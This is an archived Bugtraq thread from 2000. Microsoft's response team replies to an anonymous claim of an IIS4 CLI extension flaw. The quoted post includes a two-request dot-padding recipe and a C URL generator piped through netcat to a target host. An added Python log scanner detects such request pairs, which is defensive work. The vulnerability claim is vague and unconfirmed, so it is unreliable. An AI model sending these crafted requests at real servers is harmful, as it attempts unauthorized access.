Bugtraq mailing list archives
Re: Shinex vs. IIS CLI Extensions
From: secure () MICROSOFT COM (Microsoft Security Response Center)
Date: Thu, 8 Jun 2000 20:17:15 -0700
-----BEGIN PGP SIGNED MESSAGE-----

We'd be very interested in investigating this report, but unfortunately we
can't contact the author because of the anonymous remailer. If the author
would contact us at secure () microsoft com, we'd very much like to get some
additional information.

Regards,
Secure () microsoft com

- -----Original Message-----
From: dev-null () NO-ID COM [mailto:dev-null () NO-ID COM]
Sent: Monday, June 05, 2000 5:32 AM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Shinex vs. IIS CLI Extensions

[ This message has been sent anonymously due to configuration problems I'm
experiencing with my mail server. If you would like to discuss the fine points
of this post, you're quite welcome to message me on Efnet (nickname: shinex). ]

While doing a security audit on a WinNT 4.0 system, I discovered an `object
collision` vulnerability that can potentially lead to remote compromise. The
flaw lies in the mechanism employed by CLI objects to handle dynamic pre-auth
requests from a stateful client. States of operation are inherent in the
implementation itself. This flaw could lead to a determined attacker gaining
administrative privileges on servers using this widely deployed object kit.

EXPLOITATION NOTES
- ------------------

Request #1: http://www.victim.com/.....~518 chars.../[invocation of CLI object]
Request #2: http://www.victim.com/.....~260 chars.../[request with req1 object as ext]

Simple as that. It's important that both requests reach the target server
within a timeframe of 15 seconds (a rough estimate). Your threshold may vary.
Subsequent requests will be made with raised authorization levels. The
rationale for the char padding will be available later in the followup post
(see below).

Microsoft has been notified and patching information should be forthcoming.
While not as severe as the RDS vulnerability, it is still an avenue of attack
that could provide a determined attacker with unauthorized access.
(Allow me to mention in passing that the scarcity of detail in this paper is
intentional. A more thorough assessment will be posted after Microsoft have
released their hotfix.)

HELPER CODE
- -----------

/*
** clisweep.c by shinex (efnet)
** Quick generator for IIS4 CLI extension vuln URLs.
**
** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80
** OK. This code is buggy, because I mistakenly thought
** that both requests would be delivered without having
** to restart netcat. I can't code network apps. Sorry.
**
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define DOT1 518
#define DOT2 260
#define THRESHOLD 15
#define RANDFILE "AABBCC"

char *gendots(int);
char *calc(char *);

int main(int argc, char *argv[])
{
    char req1[1024], req2[1024];

    if(argc != 2) {
        fprintf(stderr, "Usage: %s <cli object>\n", *argv);
        return -1;
    }

    /* bounded copies: a long argv[1] must not overrun the request buffers */
    snprintf(req1, sizeof(req1), "GET /%s/%s", gendots(DOT1), argv[1]);
    snprintf(req2, sizeof(req2), "GET /%s/%s", gendots(DOT2), calc(argv[1]));

#ifdef SCRIPTKIDPROTECTION
    printf("%s\n\n", req1);
    sleep(THRESHOLD);
    printf("%s\n\n", req2);
#endif
    return 0;
}

char *gendots(int num)
{
    int i;
    static char dots[1024];
    char *ptr = dots;

    if(num > (int)sizeof(dots) - 1)
        num = sizeof(dots) - 1;
    for(i = 0; i < num; i++)
        *ptr++ = '.';
    *ptr = '\0';   /* terminate: the static buffer is reused between calls,
                      otherwise the second, shorter run keeps the first's tail */
    return dots;
}

char *calc(char *arg)
{
    static char file[1024];
    char *ptr;

    /* strip the object's extension; a missing '.' would otherwise crash here */
    ptr = strrchr(arg, '.');
    if(ptr != NULL)
        *ptr = '\0';
    snprintf(file, sizeof(file), "%s.%s", RANDFILE, arg);
    return file;
}

SHOUTOUTS
- ---------

Greets to route and my other friends.

- --
This message has been sent via an anonymous mail relay at www.no-id.com.
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.3

iQEVAwUBOUBhxo0ZSRQxA/UrAQGUEwgArWqKiGuSBSKz71ui5jFmRAf0nPRm6ez6
Ly1wVNRQLIuknJmz7eS5I6mQ7+UTgaMpT90fHRN6heU7T45xdsNAHwrJ9btNPEpW
luW3q0fHMGaTEXAEm6pAvX5ORV7pWgvRV6NHBPFv5MTLNwd9xbC4mhJXpp7sdpkO
h3XDNSuOcRmHTCcBL1Ikq8R/MgogKe/+AdTGTolAr9uvwTRTEa4SMolp98jUh813
jd54uiWU7M1tu5Wi3gsiDnIske+TzijLoyx4n8G0o01BKieiOvrYbQVvUb92DTPu
EvetLz1Gavj41M9fCP2zmdUSJInRtPXhgF4DMaiL5h1Bu0zg/T8KRg==
=QG1C
-----END PGP SIGNATURE-----
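The quoted post describes two requests whose URI paths are padded with several hundred consecutive dots and which arrive within roughly 15 seconds of each other. Whatever the merit of the underlying claim, that request shape is trivially visible in web server logs. The following is an added example, written for this archive page and not code from Microsoft or from the original poster, that scans W3C-style IIS log lines for dot-padded paths and pairs them per client within a time window. The log format subset, the thresholds (64 dots, 15 seconds) and all sample lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Minimal W3C extended log line (constructed subset):
# date time c-ip cs-method cs-uri-stem sc-status
LOG_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$"
)


def longest_dot_run(path):
    """Length of the longest run of consecutive '.' characters in a URI path."""
    best = 0
    for m in re.finditer(r"\.+", path):
        best = max(best, len(m.group(0)))
    return best


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["date"] + " " + m["time"], "%Y-%m-%d %H:%M:%S")
    return {"ts": ts, "ip": m["ip"], "method": m["method"],
            "path": m["path"], "status": int(m["status"])}


def find_dot_padded_pairs(lines, min_dots=64, window_seconds=15):
    """Return (ip, first_ts, second_ts) for every pair of dot-padded requests
    from the same client that arrive within window_seconds of each other.

    min_dots and window_seconds are assumed tuning values; normal paths never
    carry runs of dozens of dots, so a low threshold is already selective."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and longest_dot_run(rec["path"]) >= min_dots:
            by_ip[rec["ip"]].append(rec["ts"])
    window = timedelta(seconds=window_seconds)
    hits = []
    for ip, stamps in by_ip.items():
        stamps.sort()
        for a, b in zip(stamps, stamps[1:]):
            if b - a <= window:
                hits.append((ip, a, b))
    return hits


# Constructed sample log. The 518/260-dot paths mirror the shapes quoted in the
# post; client addresses, timestamps and the object name are made up.
SAMPLE_LOG = [
    "2000-06-05 05:32:01 10.0.0.5 GET /" + "." * 518 + "/example.cli 200",
    "2000-06-05 05:32:09 10.0.0.5 GET /" + "." * 260 + "/AABBCC.example 200",
    "2000-06-05 05:40:00 10.0.0.9 GET /" + "." * 518 + "/example.cli 404",
    # 90 s after the previous one: padded, but outside the pairing window
    "2000-06-05 05:41:30 10.0.0.9 GET /" + "." * 260 + "/AABBCC.example 404",
    "2000-06-05 05:45:00 10.0.0.7 GET /index.html 200",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for ip, a, b in find_dot_padded_pairs(SAMPLE_LOG):
        gap = int((b - a).total_seconds())
        print(f"{ip}: dot-padded requests at {a.time()} and {b.time()} ({gap}s apart)")
```

Run stand-alone it reports the one client whose two padded requests fall inside the window; the single padded requests from the other client are still worth logging on their own, which is why `longest_dot_run` is kept as a separate function that can feed a simpler per-request rule.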